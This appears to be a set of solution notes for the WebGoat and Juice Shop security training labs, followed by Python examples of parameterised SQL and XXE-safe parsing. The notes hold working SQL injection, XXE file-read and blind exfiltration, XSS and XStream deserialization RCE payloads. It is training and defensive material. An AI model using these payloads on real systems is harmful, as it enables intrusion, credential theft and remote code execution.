### SQLi ###

Basic:

- `Smith` - to show it returns Smith's records
- `Smith' or '1'='1` - to show the exploit; `1=1` can be any true clause

Bender login:

- `bender@juice-sh.op' --`

Numeric parameter:

- `101`
- `101 or 1=1`

Union:

```sql
Smith' union select userid,user_name, password,cookie,cookie, cookie,userid from user_system_data --
Smith' union select all 1, '2' ,user_name,password, 'MC', cookie, 2 from user_system_data --
```

### XXE ###

Simple:

```xml
<?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><comment><text>&root;</text></comment>
```

Modern REST framework: change the content type to `Content-Type: application/xml` and send:

```xml
<?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><user> <username>&root;</username><password>test</password></user>
```

Blind SendFile ... (solution comment copied from the lesson source):

```java
/**
 * Solution:
 *
 * Create DTD:
 *
 * <pre>
 * <?xml version="1.0" encoding="UTF-8"?>
 * <!ENTITY % file SYSTEM "file:///c:/windows-version.txt">
 * <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=%file;'>">
 * %all;
 * </pre>
 *
 * This will be reduced to:
 *
 * <pre>
 * <!ENTITY send SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=[contents_file]'>
 * </pre>
 *
 * Wire it all up in the XML sent to the server:
 *
 * <pre>
 * <?xml version="1.0"?>
 * <!DOCTYPE root [
 * <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd">
 * %remote;
 * ]>
 * <user>
 * <username>test&send;</username>
 * </user>
 * </pre>
 */
```

### XSS ###

- `<script>alert('my javascript here')</script>`
- `4128 3214 0002 1999` (the card number in the lesson form)

DOM-XSS - something like:

- http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere%3Cscript%3Ewebgoat.customjs.phoneHome();%3C%2Fscript%3E
- or http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere<script>webgoat.customjs.phoneHome();<%2Fscript>

### Vulnerable Components ###

jQuery page (it is contrived, but paste this into each box):

```html
OK<script>alert("XSS")<\/script>
```

For the deserialization lesson, go to the link http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/ to read about why it works so you can talk to it.

```xml
<sorted-set>
  <string>foo</string>
  <dynamic-proxy>
    <interface>java.lang.Comparable</interface>
    <handler class="java.beans.EventHandler">
      <target class="java.lang.ProcessBuilder">
        <command>
          <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>
        </command>
      </target>
      <action>start</action>
    </handler>
  </dynamic-proxy>
</sorted-set>
```
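Why the SQLi payloads in the section above work, and what closes them off, as an added example that is not part of these notes, WebGoat or Juice Shop: the tables, column names and rows below are constructed for the demo (the `user_system_data` columns only mirror the names in the union payload), and the two "vulnerable" functions are the concatenation pattern the lesson targets, placed beside their bound-parameter replacements.

```python
import sqlite3

# Constructed sample data (not WebGoat's or Juice Shop's real schema); the
# user_system_data columns mirror the names used in the union payload above.
SAMPLE_USERS = [
    (101, "Smith", "Sales"),
    (102, "Jones", "Ops"),
    (103, "Bender", "Planning"),
]
SAMPLE_SYSTEM_DATA = [
    (101, "smith", "s3cret-1", "cookie-a"),
    (102, "jones", "s3cret-2", "cookie-b"),
]
SAMPLE_ACCOUNTS = [
    ("bender@juice-sh.op", "correct-horse"),
    ("jim@juice-sh.op", "battery-staple"),
]


def make_db():
    """Build an in-memory SQLite database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, dept TEXT)")
    conn.execute(
        "CREATE TABLE user_system_data "
        "(userid INTEGER, user_name TEXT, password TEXT, cookie TEXT)"
    )
    conn.execute("CREATE TABLE accounts (email TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.executemany(
        "INSERT INTO user_system_data VALUES (?, ?, ?, ?)", SAMPLE_SYSTEM_DATA
    )
    conn.executemany("INSERT INTO accounts VALUES (?, ?)", SAMPLE_ACCOUNTS)
    return conn


def vulnerable_lookup(conn, name):
    """String concatenation: a quote in the input ends the literal and the
    remainder is parsed as SQL. This is what the Smith' payloads exploit."""
    sql = "SELECT id, name, dept FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, name):
    """Bound parameter: the whole input is one value compared character by
    character, so quotes, OR and UNION never reach the SQL parser."""
    return conn.execute(
        "SELECT id, name, dept FROM users WHERE name = ?", (name,)
    ).fetchall()


def vulnerable_login(conn, email, password):
    """Concatenated login check: bender@juice-sh.op' -- closes the literal and
    comments out the password clause, so any password is accepted."""
    sql = ("SELECT email FROM accounts WHERE email = '" + email
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(conn, email, password):
    """Parameterised login check; the same payload matches no row."""
    row = conn.execute(
        "SELECT email FROM accounts WHERE email = ? AND password = ?",
        (email, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_lookup(db, "Smith' or '1'='1"))  # every row in users
    print(safe_lookup(db, "Smith' or '1'='1"))        # []
    print(vulnerable_login(db, "bender@juice-sh.op' --", "anything"))  # bender@juice-sh.op
    print(safe_login(db, "bender@juice-sh.op' --", "anything"))        # None
```

The union payload only succeeds when its column count matches the original SELECT (three here, seven in the lesson's query), which is why the second payload in the notes pads with literals such as `1`, `'2'` and `'MC'`; with a bound parameter the count is irrelevant because the text is never parsed.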
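The defence against the XXE section above is to stop the parser from resolving external entities at all, whether the simple `&root;` file reference or the `%remote;` parameter entity that pulls in the blind DTD. This added example (not from these notes or WebGoat, which is Java; this uses Python's `xml.sax` as an assumed stand-in) feeds the "simple" payload from the notes, embedded here as constructed input, to a parser with both external-entity features switched off and shows that the entity is skipped rather than expanded.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, feature_external_pes

# Constructed inputs: the "simple" payload from the notes above (an external
# entity pointing at the local filesystem) and a benign comment for comparison.
XXE_PAYLOAD = (
    b'<?xml version="1.0" standalone="yes" ?>'
    b'<!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]>'
    b'<comment><text>&root;</text></comment>'
)
BENIGN_COMMENT = b'<comment><text>hello</text></comment>'


class TextCollector(ContentHandler):
    """Collects the character data that appears inside <text>."""

    def __init__(self):
        super().__init__()
        self._in_text = False
        self.text = ""

    def startElement(self, name, attrs):
        if name == "text":
            self._in_text = True

    def endElement(self, name):
        if name == "text":
            self._in_text = False

    def characters(self, content):
        if self._in_text:
            self.text += content


def parse_comment_text(xml_bytes):
    """Parse a <comment> document with external entity resolution disabled
    and return the content of <text>."""
    parser = xml.sax.make_parser()
    # Refuse to fetch external general entities (the &root; reference) and
    # external parameter entities (the %remote; DTD trick). Recent Python
    # releases default both to off; setting them explicitly documents the
    # intent and survives an environment that changed the default.
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text


if __name__ == "__main__":
    print(repr(parse_comment_text(BENIGN_COMMENT)))  # 'hello'
    print(repr(parse_comment_text(XXE_PAYLOAD)))     # '' - entity skipped, nothing read
```

The same two switches exist under different names in the Java parsers the lesson runs on (`disallow-doctype-decl`, `external-general-entities`, `external-parameter-entities` on a `DocumentBuilderFactory` or `XMLInputFactory.SUPPORT_DTD`); rejecting the DOCTYPE outright is the simplest setting when the application never needs a DTD.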